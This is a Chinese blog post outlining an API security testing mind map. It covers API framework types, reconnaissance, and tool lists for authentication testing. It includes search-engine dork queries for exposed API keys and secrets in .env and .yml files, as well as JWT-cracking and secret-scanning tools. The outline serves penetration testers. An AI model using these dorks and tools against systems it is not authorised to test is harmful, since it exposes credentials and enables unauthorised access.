最近API安全概念停火的,正好前一阵在Twitter上看到一个API安全的思维导图,感觉很全面,在这里稍微总结下。
API Security
一、框架识别
1.API框架种类
(1) REST APIs
RESTful 、OData
(2) GraphQL
这里有一个关于GraphQL的测试项目
https://github.com/nicholasaleks/graphql-threat-matrix
(3) SOAP
SOAP 很熟悉了,也就是WebService,开源的Service框架有Apache CXF、以及Apache AXIS1 2等
(4) XML-RPC
以更简单的 XML 格式传输数据,这里很容易联想到Apache OFbiz XML-RPC 反序列化漏洞
(5) JSON-RPC
以JSON格式化方式传输数据
(6) gRPC-Protobuf
可以从header头、Content-Type、以及Access-control-expose-headers 响应头
2.API框架简介相关文档
https://smartbear.com/blog/soap-vs-rest-whats-the-difference/
https://www.odata.org/documentation/
https://www.howtographql.com/basics/1-graphql-is-the-better-rest/
https://www.smashingmagazine.com/2016/09/understanding-rest-and-rpc-for-http-apis/
https://www.soapui.org/docs/rest-testing/working-with-rest-services/
二、一些框架自带URL特征
三、如何黑盒进行API信息收集
这里主要列出了一些API接口测试的工具和网站及技巧
工具:Burp、mitmproxy、Wireshark、APKLeaks、APKEnum、Api-Guesser、Keyhacks
Google搜索技巧:site:target.tld inurl:api 、intitle:"index of" "api.yaml" site:target.tld、
WADL WSDL:inurl:/application.wadl、user filetype:wadl、ext:wadl、user filetype:wsd、ext:wsdl、
OData:Inurl:/%24metadata
Github:https://github.com/search?q=target.tld+%252Bapi
https://github.com/search?q=target.tld+application.wadl&type=code
https://github.com/search?q=target.tld+\*.wsdl&type=code
其他:intitle:"index of" intext:"apikey.txt" site:target.tld、allintext:"API_SECRET*" ext:env | ext:yml site:target.tld
https://github.com/dxa4481/truffleHog
https://github.com/eth0izzle/shhgit
一些API聚合以及搜索网站:
https://apiharmony-open.mybluemix.net/public
https://www.programmableweb.com/
https://app.swaggerhub.com/search
https://www.postman.com/explore/apis
https://smart-api.info/registry
API字典及枚举工具:
四、API接口测试
1.一些工具
REST APIs:https://github.com/flipkart-incubator/Astra
https://github.com/bncrypted/apidor
https://github.com/SecurityInnovation/AuthMatrix
https://github.com/PortSwigger/autorize
https://github.com/portswigger/auth-analyzer
https://github.com/ant4g0nist/Susanoo
GraphQL:https://github.com/doyensec/inql
https://gitlab.com/dee-see/graphql-path-enum
https://graphql-dashboard.herokuapp.com/
gRPC:https://github.com/trailofbits/protofuzz
2.突破身份验证
(1).身份校验类型
JWT相关测试工具:https://github.com/ticarpi/jwt\_tool
https://github.com/lmammino/jwt-cracker
https://github.com/aress31/jwtcat
https://github.com/wallarm/jwt-heartbreaker
此外JWT Checklist:https://cloud.tencent.com/developer/article/1552824
Oauth
重定向测试:?redirect_uri、XSS、CSRF
Basic 认证
3.其他测试项